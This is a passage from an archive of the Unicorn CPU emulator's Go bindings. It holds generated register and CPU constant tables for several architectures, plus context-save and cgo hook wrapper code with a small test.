= 160 ARM64_REG_S25 = 161 ARM64_REG_S26 = 162 ARM64_REG_S27 = 163 ARM64_REG_S28 = 164 ARM64_REG_S29 = 165 ARM64_REG_S30 = 166 ARM64_REG_S31 = 167 ARM64_REG_W0 = 168 ARM64_REG_W1 = 169 ARM64_REG_W2 = 170 ARM64_REG_W3 = 171 ARM64_REG_W4 = 172 ARM64_REG_W5 = 173 ARM64_REG_W6 = 174 ARM64_REG_W7 = 175 ARM64_REG_W8 = 176 ARM64_REG_W9 = 177 ARM64_REG_W10 = 178 ARM64_REG_W11 = 179 ARM64_REG_W12 = 180 ARM64_REG_W13 = 181 ARM64_REG_W14 = 182 ARM64_REG_W15 = 183 ARM64_REG_W16 = 184 ARM64_REG_W17 = 185 ARM64_REG_W18 = 186 ARM64_REG_W19 = 187 ARM64_REG_W20 = 188 ARM64_REG_W21 = 189 ARM64_REG_W22 = 190 ARM64_REG_W23 = 191 ARM64_REG_W24 = 192 ARM64_REG_W25 = 193 ARM64_REG_W26 = 194 ARM64_REG_W27 = 195 ARM64_REG_W28 = 196 ARM64_REG_W29 = 197 ARM64_REG_W30 = 198 ARM64_REG_X0 = 199 ARM64_REG_X1 = 200 ARM64_REG_X2 = 201 ARM64_REG_X3 = 202 ARM64_REG_X4 = 203 ARM64_REG_X5 = 204 ARM64_REG_X6 = 205 ARM64_REG_X7 = 206 ARM64_REG_X8 = 207 ARM64_REG_X9 = 208 ARM64_REG_X10 = 209 ARM64_REG_X11 = 210 ARM64_REG_X12 = 211 ARM64_REG_X13 = 212 ARM64_REG_X14 = 213 ARM64_REG_X15 = 214 ARM64_REG_X16 = 215 ARM64_REG_X17 = 216 ARM64_REG_X18 = 217 ARM64_REG_X19 = 218 ARM64_REG_X20 = 219 ARM64_REG_X21 = 220 ARM64_REG_X22 = 221 ARM64_REG_X23 = 222 ARM64_REG_X24 = 223 ARM64_REG_X25 = 224 ARM64_REG_X26 = 225 ARM64_REG_X27 = 226 ARM64_REG_X28 = 227 ARM64_REG_V0 = 228 ARM64_REG_V1 = 229 ARM64_REG_V2 = 230 ARM64_REG_V3 = 231 ARM64_REG_V4 = 232 ARM64_REG_V5 = 233 ARM64_REG_V6 = 234 ARM64_REG_V7 = 235 ARM64_REG_V8 = 236 ARM64_REG_V9 = 237 ARM64_REG_V10 = 238 ARM64_REG_V11 = 239 ARM64_REG_V12 = 240 ARM64_REG_V13 = 241 ARM64_REG_V14 = 242 ARM64_REG_V15 = 243 ARM64_REG_V16 = 244 ARM64_REG_V17 = 245 ARM64_REG_V18 = 246 ARM64_REG_V19 = 247 ARM64_REG_V20 = 248 ARM64_REG_V21 = 249 ARM64_REG_V22 = 250 ARM64_REG_V23 = 251 ARM64_REG_V24 = 252 ARM64_REG_V25 = 253 ARM64_REG_V26 = 254 ARM64_REG_V27 = 255 ARM64_REG_V28 = 256 ARM64_REG_V29 = 257 ARM64_REG_V30 = 258 ARM64_REG_V31 = 259 // pseudo registers ARM64_REG_PC = 260 ARM64_REG_CPACR_EL1 = 261 // thread registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_TPIDR_EL0 = 262 ARM64_REG_TPIDRRO_EL0 = 263 ARM64_REG_TPIDR_EL1 = 264 ARM64_REG_PSTATE = 265 // exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_ELR_EL0 = 266 ARM64_REG_ELR_EL1 = 267 ARM64_REG_ELR_EL2 = 268 ARM64_REG_ELR_EL3 = 269 // stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_SP_EL0 = 270 ARM64_REG_SP_EL1 = 271 ARM64_REG_SP_EL2 = 272 ARM64_REG_SP_EL3 = 273 // other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_TTBR0_EL1 = 274 ARM64_REG_TTBR1_EL1 = 275 ARM64_REG_ESR_EL0 = 276 ARM64_REG_ESR_EL1 = 277 ARM64_REG_ESR_EL2 = 278 ARM64_REG_ESR_EL3 = 279 ARM64_REG_FAR_EL0 = 280 ARM64_REG_FAR_EL1 = 281 ARM64_REG_FAR_EL2 = 282 ARM64_REG_FAR_EL3 = 283 ARM64_REG_PAR_EL1 = 284 ARM64_REG_MAIR_EL1 = 285 ARM64_REG_VBAR_EL0 = 286 ARM64_REG_VBAR_EL1 = 287 ARM64_REG_VBAR_EL2 = 288 ARM64_REG_VBAR_EL3 = 289 ARM64_REG_CP_REG = 290 // floating point control and status registers ARM64_REG_FPCR = 291 ARM64_REG_FPSR = 292 ARM64_REG_ENDING = 293 // alias registers ARM64_REG_IP0 = 215 ARM64_REG_IP1 = 216 ARM64_REG_FP = 1 ARM64_REG_LR = 2 // ARM64 instructions ARM64_INS_INVALID = 0 ARM64_INS_MRS = 1 ARM64_INS_MSR = 2 ARM64_INS_SYS = 3 ARM64_INS_SYSL = 4 ARM64_INS_ENDING = 5 )unicorn-2.1.1/bindings/go/unicorn/arm_const.go000066400000000000000000000072251467524106700214050ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm_const.go] const ( // ARM CPU CPU_ARM_926 = 0 CPU_ARM_946 = 1 CPU_ARM_1026 = 2 CPU_ARM_1136_R2 = 3 CPU_ARM_1136 = 4 CPU_ARM_1176 = 5 CPU_ARM_11MPCORE = 6 CPU_ARM_CORTEX_M0 = 7 CPU_ARM_CORTEX_M3 = 8 CPU_ARM_CORTEX_M4 = 9 CPU_ARM_CORTEX_M7 = 10 CPU_ARM_CORTEX_M33 = 11 CPU_ARM_CORTEX_R5 = 12 CPU_ARM_CORTEX_R5F = 13 CPU_ARM_CORTEX_A7 = 14 CPU_ARM_CORTEX_A8 = 15 CPU_ARM_CORTEX_A9 = 16 CPU_ARM_CORTEX_A15 = 17 CPU_ARM_TI925T = 18 CPU_ARM_SA1100 = 19 CPU_ARM_SA1110 = 20 CPU_ARM_PXA250 = 21 CPU_ARM_PXA255 = 22 CPU_ARM_PXA260 = 23 CPU_ARM_PXA261 = 24 CPU_ARM_PXA262 = 25 CPU_ARM_PXA270 = 26 CPU_ARM_PXA270A0 = 27 CPU_ARM_PXA270A1 = 28 CPU_ARM_PXA270B0 = 29 CPU_ARM_PXA270B1 = 30 CPU_ARM_PXA270C0 = 31 CPU_ARM_PXA270C5 = 32 CPU_ARM_MAX = 33 CPU_ARM_ENDING = 34 // ARM registers ARM_REG_INVALID = 0 ARM_REG_APSR = 1 ARM_REG_APSR_NZCV = 2 ARM_REG_CPSR = 3 ARM_REG_FPEXC = 4 ARM_REG_FPINST = 5 ARM_REG_FPSCR = 6 ARM_REG_FPSCR_NZCV = 7 ARM_REG_FPSID = 8 ARM_REG_ITSTATE = 9 ARM_REG_LR = 10 ARM_REG_PC = 11 ARM_REG_SP = 12 ARM_REG_SPSR = 13 ARM_REG_D0 = 14 ARM_REG_D1 = 15 ARM_REG_D2 = 16 ARM_REG_D3 = 17 ARM_REG_D4 = 18 ARM_REG_D5 = 19 ARM_REG_D6 = 20 ARM_REG_D7 = 21 ARM_REG_D8 = 22 ARM_REG_D9 = 23 ARM_REG_D10 = 24 ARM_REG_D11 = 25 ARM_REG_D12 = 26 ARM_REG_D13 = 27 ARM_REG_D14 = 28 ARM_REG_D15 = 29 ARM_REG_D16 = 30 ARM_REG_D17 = 31 ARM_REG_D18 = 32 ARM_REG_D19 = 33 ARM_REG_D20 = 34 ARM_REG_D21 = 35 ARM_REG_D22 = 36 ARM_REG_D23 = 37 ARM_REG_D24 = 38 ARM_REG_D25 = 39 ARM_REG_D26 = 40 ARM_REG_D27 = 41 ARM_REG_D28 = 42 ARM_REG_D29 = 43 ARM_REG_D30 = 44 ARM_REG_D31 = 45 ARM_REG_FPINST2 = 46 ARM_REG_MVFR0 = 47 ARM_REG_MVFR1 = 48 ARM_REG_MVFR2 = 49 ARM_REG_Q0 = 50 ARM_REG_Q1 = 51 ARM_REG_Q2 = 52 ARM_REG_Q3 = 53 ARM_REG_Q4 = 54 ARM_REG_Q5 = 55 ARM_REG_Q6 = 56 ARM_REG_Q7 = 57 ARM_REG_Q8 = 58 ARM_REG_Q9 = 59 ARM_REG_Q10 = 60 ARM_REG_Q11 = 61 ARM_REG_Q12 = 62 ARM_REG_Q13 = 63 ARM_REG_Q14 = 64 ARM_REG_Q15 = 65 ARM_REG_R0 = 66 ARM_REG_R1 = 67 ARM_REG_R2 = 68 ARM_REG_R3 = 69 ARM_REG_R4 = 70 ARM_REG_R5 = 71 ARM_REG_R6 = 72 ARM_REG_R7 = 73 ARM_REG_R8 = 74 ARM_REG_R9 = 75 ARM_REG_R10 = 76 ARM_REG_R11 = 77 ARM_REG_R12 = 78 ARM_REG_S0 = 79 ARM_REG_S1 = 80 ARM_REG_S2 = 81 ARM_REG_S3 = 82 ARM_REG_S4 = 83 ARM_REG_S5 = 84 ARM_REG_S6 = 85 ARM_REG_S7 = 86 ARM_REG_S8 = 87 ARM_REG_S9 = 88 ARM_REG_S10 = 89 ARM_REG_S11 = 90 ARM_REG_S12 = 91 ARM_REG_S13 = 92 ARM_REG_S14 = 93 ARM_REG_S15 = 94 ARM_REG_S16 = 95 ARM_REG_S17 = 96 ARM_REG_S18 = 97 ARM_REG_S19 = 98 ARM_REG_S20 = 99 ARM_REG_S21 = 100 ARM_REG_S22 = 101 ARM_REG_S23 = 102 ARM_REG_S24 = 103 ARM_REG_S25 = 104 ARM_REG_S26 = 105 ARM_REG_S27 = 106 ARM_REG_S28 = 107 ARM_REG_S29 = 108 ARM_REG_S30 = 109 ARM_REG_S31 = 110 ARM_REG_C1_C0_2 = 111 ARM_REG_C13_C0_2 = 112 ARM_REG_C13_C0_3 = 113 ARM_REG_IPSR = 114 ARM_REG_MSP = 115 ARM_REG_PSP = 116 ARM_REG_CONTROL = 117 ARM_REG_IAPSR = 118 ARM_REG_EAPSR = 119 ARM_REG_XPSR = 120 ARM_REG_EPSR = 121 ARM_REG_IEPSR = 122 ARM_REG_PRIMASK = 123 ARM_REG_BASEPRI = 124 ARM_REG_BASEPRI_MAX = 125 ARM_REG_FAULTMASK = 126 ARM_REG_APSR_NZCVQ = 127 ARM_REG_APSR_G = 128 ARM_REG_APSR_NZCVQG = 129 ARM_REG_IAPSR_NZCVQ = 130 ARM_REG_IAPSR_G = 131 ARM_REG_IAPSR_NZCVQG = 132 ARM_REG_EAPSR_NZCVQ = 133 ARM_REG_EAPSR_G = 134 ARM_REG_EAPSR_NZCVQG = 135 ARM_REG_XPSR_NZCVQ = 136 ARM_REG_XPSR_G = 137 ARM_REG_XPSR_NZCVQG = 138 ARM_REG_CP_REG = 139 ARM_REG_ENDING = 140 // alias registers ARM_REG_R13 = 12 ARM_REG_R14 = 10 ARM_REG_R15 = 11 ARM_REG_SB = 75 ARM_REG_SL = 76 ARM_REG_FP = 77 ARM_REG_IP = 78 )unicorn-2.1.1/bindings/go/unicorn/context.go000066400000000000000000000011441467524106700210760ustar00rootroot00000000000000package unicorn import ( "runtime" "unsafe" ) // #include import "C" type Context **C.uc_context func (u *uc) ContextSave(reuse Context) (Context, error) { ctx := reuse if ctx == nil { ctx = new(*C.uc_context) } if err := errReturn(C.uc_context_alloc(u.handle, ctx)); err != nil { return nil, err } runtime.SetFinalizer(ctx, func(p Context) { C.uc_free(unsafe.Pointer(*p)) }) if err := errReturn(C.uc_context_save(u.handle, *ctx)); err != nil { } return ctx, nil } func (u *uc) ContextRestore(ctx Context) error { return errReturn(C.uc_context_restore(u.handle, *ctx)) } unicorn-2.1.1/bindings/go/unicorn/context_test.go000066400000000000000000000006601467524106700221370ustar00rootroot00000000000000package unicorn import ( "testing" ) func TestContext(t *testing.T) { u, err := NewUnicorn(ARCH_X86, MODE_32) if err != nil { t.Fatal(err) } u.RegWrite(X86_REG_EBP, 100) ctx, err := u.ContextSave(nil) if err != nil { t.Fatal(err) } u.RegWrite(X86_REG_EBP, 200) err = u.ContextRestore(ctx) if err != nil { t.Fatal(err) } val, _ := u.RegRead(X86_REG_EBP) if val != 100 { t.Fatal("context restore failed") } } unicorn-2.1.1/bindings/go/unicorn/hook.c000066400000000000000000000032661467524106700201760ustar00rootroot00000000000000#include #include "_cgo_export.h" uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...); uc_err uc_hook_add_wrap(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end) { return uc_hook_add(handle, h2, type, callback, (void *)user, begin, end); } uc_err uc_hook_add_insn(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end, int insn) { return uc_hook_add(handle, h2, type, callback, (void *)user, begin, end, insn); } void hookCode_cgo(uc_engine *handle, uint64_t addr, uint32_t size, uintptr_t user) { hookCode(handle, addr, size, (void *)user); } bool hookMemInvalid_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user) { return hookMemInvalid(handle, type, addr, size, value, (void *)user); } void hookMemAccess_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user) { hookMemAccess(handle, type, addr, size, value, (void *)user); } void hookInterrupt_cgo(uc_engine *handle, uint32_t intno, uintptr_t user) { hookInterrupt(handle, intno, (void *)user); } uint32_t hookX86In_cgo(uc_engine *handle, uint32_t port, uint32_t size, uintptr_t user) { return hookX86In(handle, port, size, (void *)user); } void hookX86Out_cgo(uc_engine *handle, uint32_t port, uint32_t size, uint32_t value, uintptr_t user) { hookX86Out(handle, port, size, value, (void *)user); } void hookX86Syscall_cgo(uc_engine *handle, uintptr_t user) { hookX86Syscall(handle, (void *)user); } unicorn-2.1.1/bindings/go/unicorn/hook.go000066400000000000000000000076501467524106700203620ustar00rootroot00000000000000package unicorn import ( "errors" "sync" "unsafe" ) /* #include #include "hook.h" */ import "C" type HookData struct { Uc Unicorn Callback interface{} } type Hook uint64 type fastHookMap struct { vals []*HookData sync.RWMutex } func (m *fastHookMap) insert(h *HookData) uintptr { // don't change this to defer m.Lock() for i, v := range m.vals { if v == nil { m.vals[i] = h m.Unlock() return uintptr(i) } } i := len(m.vals) m.vals = append(m.vals, h) m.Unlock() return uintptr(i) } func (m *fastHookMap) get(i unsafe.Pointer) *HookData { m.RLock() // TODO: nil check? v := m.vals[uintptr(i)] m.RUnlock() return v } func (m *fastHookMap) remove(i uintptr) { m.Lock() m.vals[i] = nil m.Unlock() } var hookMap fastHookMap //export hookCode func hookCode(handle unsafe.Pointer, addr uint64, size uint32, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn, uint64, uint32))(hook.Uc, uint64(addr), uint32(size)) } //export hookMemInvalid func hookMemInvalid(handle unsafe.Pointer, typ C.uc_mem_type, addr uint64, size int, value int64, user unsafe.Pointer) bool { hook := hookMap.get(user) return hook.Callback.(func(Unicorn, int, uint64, int, int64) bool)(hook.Uc, int(typ), addr, size, value) } //export hookMemAccess func hookMemAccess(handle unsafe.Pointer, typ C.uc_mem_type, addr uint64, size int, value int64, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn, int, uint64, int, int64))(hook.Uc, int(typ), addr, size, value) } //export hookInterrupt func hookInterrupt(handle unsafe.Pointer, intno uint32, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn, uint32))(hook.Uc, intno) } //export hookX86In func hookX86In(handle unsafe.Pointer, port, size uint32, user unsafe.Pointer) uint32 { hook := hookMap.get(user) return hook.Callback.(func(Unicorn, uint32, uint32) uint32)(hook.Uc, port, size) } //export hookX86Out func hookX86Out(handle unsafe.Pointer, port, size, value uint32, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn, uint32, uint32, uint32))(hook.Uc, port, size, value) } //export hookX86Syscall func hookX86Syscall(handle unsafe.Pointer, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn))(hook.Uc) } func (u *uc) HookAdd(htype int, cb interface{}, begin, end uint64, extra ...int) (Hook, error) { var callback unsafe.Pointer var insn C.int var insnMode bool switch htype { case HOOK_BLOCK, HOOK_CODE: callback = C.hookCode_cgo case HOOK_MEM_READ, HOOK_MEM_WRITE, HOOK_MEM_READ | HOOK_MEM_WRITE: callback = C.hookMemAccess_cgo case HOOK_INTR: callback = C.hookInterrupt_cgo case HOOK_INSN: insn = C.int(extra[0]) insnMode = true switch insn { case X86_INS_IN: callback = C.hookX86In_cgo case X86_INS_OUT: callback = C.hookX86Out_cgo case X86_INS_SYSCALL, X86_INS_SYSENTER: callback = C.hookX86Syscall_cgo default: return 0, errors.New("Unknown instruction type.") } default: // special case for mask if htype&(HOOK_MEM_READ_UNMAPPED|HOOK_MEM_WRITE_UNMAPPED|HOOK_MEM_FETCH_UNMAPPED| HOOK_MEM_READ_PROT|HOOK_MEM_WRITE_PROT|HOOK_MEM_FETCH_PROT) != 0 { callback = C.hookMemInvalid_cgo } else { return 0, errors.New("Unknown hook type.") } } var h2 C.uc_hook data := &HookData{u, cb} uptr := hookMap.insert(data) if insnMode { C.uc_hook_add_insn(u.handle, &h2, C.uc_hook_type(htype), callback, C.uintptr_t(uptr), C.uint64_t(begin), C.uint64_t(end), insn) } else { C.uc_hook_add_wrap(u.handle, &h2, C.uc_hook_type(htype), callback, C.uintptr_t(uptr), C.uint64_t(begin), C.uint64_t(end)) } // TODO: could move Hook and uptr onto HookData and just return it u.hooks[Hook(h2)] = uptr return Hook(h2), nil } func (u *uc) HookDel(hook Hook) error { if uptr, ok := u.hooks[hook]; ok { delete(u.hooks, hook) hookMap.remove(uptr) } return errReturn(C.uc_hook_del(u.handle, C.uc_hook(hook))) } unicorn-2.1.1/bindings/go/unicorn/hook.h000066400000000000000000000016431467524106700202000ustar00rootroot00000000000000uc_err uc_hook_add_wrap(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end); uc_err uc_hook_add_insn(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end, int insn); void hookCode_cgo(uc_engine *handle, uint64_t addr, uint32_t size, uintptr_t user); bool hookMemInvalid_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user); void hookMemAccess_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user); void hookInterrupt_cgo(uc_engine *handle, uint32_t intno, uintptr_t user); uint32_t hookX86In_cgo(uc_engine *handle, uint32_t port, uint32_t size, uintptr_t user); void hookX86Out_cgo(uc_engine *handle, uint32_t port, uint32_t size, uint32_t value, uintptr_t user); void hookX86Syscall_cgo(uc_engine *handle, uintptr_t user); unicorn-2.1.1/bindings/go/unicorn/m68k_const.go000066400000000000000000000012661467524106700214120ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.go] const ( // M68K CPU CPU_M68K_M5206 = 0 CPU_M68K_M68000 = 1 CPU_M68K_M68020 = 2 CPU_M68K_M68030 = 3 CPU_M68K_M68040 = 4 CPU_M68K_M68060 = 5 CPU_M68K_M5208 = 6 CPU_M68K_CFV4E = 7 CPU_M68K_ANY = 8 CPU_M68K_ENDING = 9 // M68K registers M68K_REG_INVALID = 0 M68K_REG_A0 = 1 M68K_REG_A1 = 2 M68K_REG_A2 = 3 M68K_REG_A3 = 4 M68K_REG_A4 = 5 M68K_REG_A5 = 6 M68K_REG_A6 = 7 M68K_REG_A7 = 8 M68K_REG_D0 = 9 M68K_REG_D1 = 10 M68K_REG_D2 = 11 M68K_REG_D3 = 12 M68K_REG_D4 = 13 M68K_REG_D5 = 14 M68K_REG_D6 = 15 M68K_REG_D7 = 16 M68K_REG_SR = 17 M68K_REG_PC = 18 M68K_REG_ENDING = 19 )unicorn-2.1.1/bindings/go/unicorn/mips_const.go000066400000000000000000000106071467524106700215740ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.go] const ( // MIPS32 CPUS CPU_MIPS32_4KC = 0 CPU_MIPS32_4KM = 1 CPU_MIPS32_4KECR1 = 2 CPU_MIPS32_4KEMR1 = 3 CPU_MIPS32_4KEC = 4 CPU_MIPS32_4KEM = 5 CPU_MIPS32_24KC = 6 CPU_MIPS32_24KEC = 7 CPU_MIPS32_24KF = 8 CPU_MIPS32_34KF = 9 CPU_MIPS32_74KF = 10 CPU_MIPS32_M14K = 11 CPU_MIPS32_M14KC = 12 CPU_MIPS32_P5600 = 13 CPU_MIPS32_MIPS32R6_GENERIC = 14 CPU_MIPS32_I7200 = 15 CPU_MIPS32_ENDING = 16 // MIPS64 CPUS CPU_MIPS64_R4000 = 0 CPU_MIPS64_VR5432 = 1 CPU_MIPS64_5KC = 2 CPU_MIPS64_5KF = 3 CPU_MIPS64_20KC = 4 CPU_MIPS64_MIPS64R2_GENERIC = 5 CPU_MIPS64_5KEC = 6 CPU_MIPS64_5KEF = 7 CPU_MIPS64_I6400 = 8 CPU_MIPS64_I6500 = 9 CPU_MIPS64_LOONGSON_2E = 10 CPU_MIPS64_LOONGSON_2F = 11 CPU_MIPS64_MIPS64DSPR2 = 12 CPU_MIPS64_ENDING = 13 // MIPS registers MIPS_REG_INVALID = 0 // General purpose registers MIPS_REG_PC = 1 MIPS_REG_0 = 2 MIPS_REG_1 = 3 MIPS_REG_2 = 4 MIPS_REG_3 = 5 MIPS_REG_4 = 6 MIPS_REG_5 = 7 MIPS_REG_6 = 8 MIPS_REG_7 = 9 MIPS_REG_8 = 10 MIPS_REG_9 = 11 MIPS_REG_10 = 12 MIPS_REG_11 = 13 MIPS_REG_12 = 14 MIPS_REG_13 = 15 MIPS_REG_14 = 16 MIPS_REG_15 = 17 MIPS_REG_16 = 18 MIPS_REG_17 = 19 MIPS_REG_18 = 20 MIPS_REG_19 = 21 MIPS_REG_20 = 22 MIPS_REG_21 = 23 MIPS_REG_22 = 24 MIPS_REG_23 = 25 MIPS_REG_24 = 26 MIPS_REG_25 = 27 MIPS_REG_26 = 28 MIPS_REG_27 = 29 MIPS_REG_28 = 30 MIPS_REG_29 = 31 MIPS_REG_30 = 32 MIPS_REG_31 = 33 // DSP registers MIPS_REG_DSPCCOND = 34 MIPS_REG_DSPCARRY = 35 MIPS_REG_DSPEFI = 36 MIPS_REG_DSPOUTFLAG = 37 MIPS_REG_DSPOUTFLAG16_19 = 38 MIPS_REG_DSPOUTFLAG20 = 39 MIPS_REG_DSPOUTFLAG21 = 40 MIPS_REG_DSPOUTFLAG22 = 41 MIPS_REG_DSPOUTFLAG23 = 42 MIPS_REG_DSPPOS = 43 MIPS_REG_DSPSCOUNT = 44 // ACC registers MIPS_REG_AC0 = 45 MIPS_REG_AC1 = 46 MIPS_REG_AC2 = 47 MIPS_REG_AC3 = 48 // COP registers MIPS_REG_CC0 = 49 MIPS_REG_CC1 = 50 MIPS_REG_CC2 = 51 MIPS_REG_CC3 = 52 MIPS_REG_CC4 = 53 MIPS_REG_CC5 = 54 MIPS_REG_CC6 = 55 MIPS_REG_CC7 = 56 // FPU registers MIPS_REG_F0 = 57 MIPS_REG_F1 = 58 MIPS_REG_F2 = 59 MIPS_REG_F3 = 60 MIPS_REG_F4 = 61 MIPS_REG_F5 = 62 MIPS_REG_F6 = 63 MIPS_REG_F7 = 64 MIPS_REG_F8 = 65 MIPS_REG_F9 = 66 MIPS_REG_F10 = 67 MIPS_REG_F11 = 68 MIPS_REG_F12 = 69 MIPS_REG_F13 = 70 MIPS_REG_F14 = 71 MIPS_REG_F15 = 72 MIPS_REG_F16 = 73 MIPS_REG_F17 = 74 MIPS_REG_F18 = 75 MIPS_REG_F19 = 76 MIPS_REG_F20 = 77 MIPS_REG_F21 = 78 MIPS_REG_F22 = 79 MIPS_REG_F23 = 80 MIPS_REG_F24 = 81 MIPS_REG_F25 = 82 MIPS_REG_F26 = 83 MIPS_REG_F27 = 84 MIPS_REG_F28 = 85 MIPS_REG_F29 = 86 MIPS_REG_F30 = 87 MIPS_REG_F31 = 88 MIPS_REG_FCC0 = 89 MIPS_REG_FCC1 = 90 MIPS_REG_FCC2 = 91 MIPS_REG_FCC3 = 92 MIPS_REG_FCC4 = 93 MIPS_REG_FCC5 = 94 MIPS_REG_FCC6 = 95 MIPS_REG_FCC7 = 96 // AFPR128 MIPS_REG_W0 = 97 MIPS_REG_W1 = 98 MIPS_REG_W2 = 99 MIPS_REG_W3 = 100 MIPS_REG_W4 = 101 MIPS_REG_W5 = 102 MIPS_REG_W6 = 103 MIPS_REG_W7 = 104 MIPS_REG_W8 = 105 MIPS_REG_W9 = 106 MIPS_REG_W10 = 107 MIPS_REG_W11 = 108 MIPS_REG_W12 = 109 MIPS_REG_W13 = 110 MIPS_REG_W14 = 111 MIPS_REG_W15 = 112 MIPS_REG_W16 = 113 MIPS_REG_W17 = 114 MIPS_REG_W18 = 115 MIPS_REG_W19 = 116 MIPS_REG_W20 = 117 MIPS_REG_W21 = 118 MIPS_REG_W22 = 119 MIPS_REG_W23 = 120 MIPS_REG_W24 = 121 MIPS_REG_W25 = 122 MIPS_REG_W26 = 123 MIPS_REG_W27 = 124 MIPS_REG_W28 = 125 MIPS_REG_W29 = 126 MIPS_REG_W30 = 127 MIPS_REG_W31 = 128 MIPS_REG_HI = 129 MIPS_REG_LO = 130 MIPS_REG_P0 = 131 MIPS_REG_P1 = 132 MIPS_REG_P2 = 133 MIPS_REG_MPL0 = 134 MIPS_REG_MPL1 = 135 MIPS_REG_MPL2 = 136 MIPS_REG_CP0_CONFIG3 = 137 MIPS_REG_CP0_USERLOCAL = 138 MIPS_REG_CP0_STATUS = 139 MIPS_REG_ENDING = 140 MIPS_REG_ZERO = 2 MIPS_REG_AT = 3 MIPS_REG_V0 = 4 MIPS_REG_V1 = 5 MIPS_REG_A0 = 6 MIPS_REG_A1 = 7 MIPS_REG_A2 = 8 MIPS_REG_A3 = 9 MIPS_REG_T0 = 10 MIPS_REG_T1 = 11 MIPS_REG_T2 = 12 MIPS_REG_T3 = 13 MIPS_REG_T4 = 14 MIPS_REG_T5 = 15 MIPS_REG_T6 = 16 MIPS_REG_T7 = 17 MIPS_REG_S0 = 18 MIPS_REG_S1 = 19 MIPS_REG_S2 = 20 MIPS_REG_S3 = 21 MIPS_REG_S4 = 22 MIPS_REG_S5 = 23 MIPS_REG_S6 = 24 MIPS_REG_S7 = 25 MIPS_REG_T8 = 26 MIPS_REG_T9 = 27 MIPS_REG_K0 = 28 MIPS_REG_K1 = 29 MIPS_REG_GP = 30 MIPS_REG_SP = 31 MIPS_REG_FP = 32 MIPS_REG_S8 = 32 MIPS_REG_RA = 33 MIPS_REG_HI0 = 45 MIPS_REG_HI1 = 46 MIPS_REG_HI2 = 47 MIPS_REG_HI3 = 48 MIPS_REG_LO0 = 45 MIPS_REG_LO1 = 46 MIPS_REG_LO2 = 47 MIPS_REG_LO3 = 48 )unicorn-2.1.1/bindings/go/unicorn/ppc_const.go000066400000000000000000000227721467524106700214140ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [ppc_const.go] const ( // PPC CPU CPU_PPC32_401 = 0 CPU_PPC32_401A1 = 1 CPU_PPC32_401B2 = 2 CPU_PPC32_401C2 = 3 CPU_PPC32_401D2 = 4 CPU_PPC32_401E2 = 5 CPU_PPC32_401F2 = 6 CPU_PPC32_401G2 = 7 CPU_PPC32_IOP480 = 8 CPU_PPC32_COBRA = 9 CPU_PPC32_403GA = 10 CPU_PPC32_403GB = 11 CPU_PPC32_403GC = 12 CPU_PPC32_403GCX = 13 CPU_PPC32_405D2 = 14 CPU_PPC32_405D4 = 15 CPU_PPC32_405CRA = 16 CPU_PPC32_405CRB = 17 CPU_PPC32_405CRC = 18 CPU_PPC32_405EP = 19 CPU_PPC32_405EZ = 20 CPU_PPC32_405GPA = 21 CPU_PPC32_405GPB = 22 CPU_PPC32_405GPC = 23 CPU_PPC32_405GPD = 24 CPU_PPC32_405GPR = 25 CPU_PPC32_405LP = 26 CPU_PPC32_NPE405H = 27 CPU_PPC32_NPE405H2 = 28 CPU_PPC32_NPE405L = 29 CPU_PPC32_NPE4GS3 = 30 CPU_PPC32_STB03 = 31 CPU_PPC32_STB04 = 32 CPU_PPC32_STB25 = 33 CPU_PPC32_X2VP4 = 34 CPU_PPC32_X2VP20 = 35 CPU_PPC32_440_XILINX = 36 CPU_PPC32_440_XILINX_W_DFPU = 37 CPU_PPC32_440EPA = 38 CPU_PPC32_440EPB = 39 CPU_PPC32_440EPX = 40 CPU_PPC32_460EXB = 41 CPU_PPC32_G2 = 42 CPU_PPC32_G2H4 = 43 CPU_PPC32_G2GP = 44 CPU_PPC32_G2LS = 45 CPU_PPC32_G2HIP3 = 46 CPU_PPC32_G2HIP4 = 47 CPU_PPC32_MPC603 = 48 CPU_PPC32_G2LE = 49 CPU_PPC32_G2LEGP = 50 CPU_PPC32_G2LELS = 51 CPU_PPC32_G2LEGP1 = 52 CPU_PPC32_G2LEGP3 = 53 CPU_PPC32_MPC5200_V10 = 54 CPU_PPC32_MPC5200_V11 = 55 CPU_PPC32_MPC5200_V12 = 56 CPU_PPC32_MPC5200B_V20 = 57 CPU_PPC32_MPC5200B_V21 = 58 CPU_PPC32_E200Z5 = 59 CPU_PPC32_E200Z6 = 60 CPU_PPC32_E300C1 = 61 CPU_PPC32_E300C2 = 62 CPU_PPC32_E300C3 = 63 CPU_PPC32_E300C4 = 64 CPU_PPC32_MPC8343 = 65 CPU_PPC32_MPC8343A = 66 CPU_PPC32_MPC8343E = 67 CPU_PPC32_MPC8343EA = 68 